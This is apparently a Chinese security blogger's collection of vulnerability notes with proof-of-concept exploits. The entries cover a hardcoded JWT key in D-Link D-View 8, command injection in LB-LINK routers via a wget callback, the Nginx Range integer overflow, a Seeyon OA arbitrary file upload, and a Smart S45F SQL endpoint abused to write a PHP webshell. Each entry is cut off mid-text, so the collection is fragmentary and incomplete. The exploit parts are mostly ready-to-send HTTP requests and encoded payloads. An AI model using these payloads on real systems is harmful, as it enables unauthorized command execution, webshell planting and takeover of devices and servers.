原理由于JWT令牌的安全校验使用的是硬编码,导致攻击者可伪造合法的JWT令牌进行访问。危害由于默认情况下,初始管理员的 userId 是相同的,未授权攻击者可以利用 JWT 密钥配合该 userId 伪造令牌,从而访问受保护的API路由。分析Tenable的一名研究人员在D-Link D-View 8 v2.0.1.28中发现了一个身份验证绕过漏洞。D-View 8使用硬编码的密钥(D-Link)来保护用户身份验证中使用的JWT令牌:// webApi-0.0.1-SNAPSHOT.jar!com.dlink.dview8.webapi.utils.TokenUtils public static String verifyToken(String token) { if (Utils.isEmpty(token)) return null; Algorithm algorithm = Algorithm.HMAC256("D-Link"); JWTVerifier verifier = JWT.require(algor
原理LB-LINK BL-AC1900等都是中国必联(LB-LINK)公司的一款无线路由器。该漏洞源于通过/goform/set_LimitClient_cfg中的mac、time1和time2参数发现包含命令注入漏洞。影响范围LB-LINK BL-AC1900_2.0 v1.0.1版本、LB-LINK BL-WR9000 v2.4.9版本、LB-LINK BL-X26 v1.2.5版本、LB-LINK BL-LTE300 v1.0.8版本存在安全漏洞。危害远程攻击者可利用该漏洞执行任意命令,取得服务器控制权。POC & EXP手工POST /goform/set_LimitClient_cfg HTTP/1.1 Cookie: user=admin time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://dnslog.cn;
原理Nginx范围过滤器模块中存在整数溢出漏洞,允许远程攻击者利用漏洞提交特殊的请求,获取敏感信息或使应用程序崩溃。影响范围Nginx < 1.13.2危害获取缓存的HTTP请求或使应用程序崩溃。POC & EXP手工GET / HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Range: bytes=-17208,-9223372036854758792状态码为206则说明存在漏洞。脚本https://github.com/en0f/CVE-2017-7529_PoC
原理未授权访问文件上传点导致任意文件上传漏洞,目标文件的一个参数将文件经过。影响范围致远OA V8.0;致远OA V7.1、V7.1SP1;致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3;致远OA V6.0、V6.1SP1、V6.1SP2;致远OA V5.x;致远OA G6POC & EXP手工arguments接收一个Gzip压缩后再URL编码的字符串,payload中的恶意代码将在被解压之后写入指定文件中。POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1 Host: ip:port Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Prest
原理SQL语句执行接口未授权访问,可执行任意SQL语句。影响范围Smart S45F危害远程攻击者可利用该漏洞执行任意SQL语句,包括写入webshell。POC & EXP手工漏洞位置:https://ip:port/importexport.php该接口可以使用GET参数执行SQL语句参数sql=base64编码的SQL语句 参数type=exportexcelbysql,执行动作 POC:1https://ip:port/importexport.php?sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvc2VjLnBocCc=&type=exportexcelbysql base64: select 0x3c3f706870206563686f2073797374656d28245f504f53545b2263
Equinox
一个乐于分享的网安人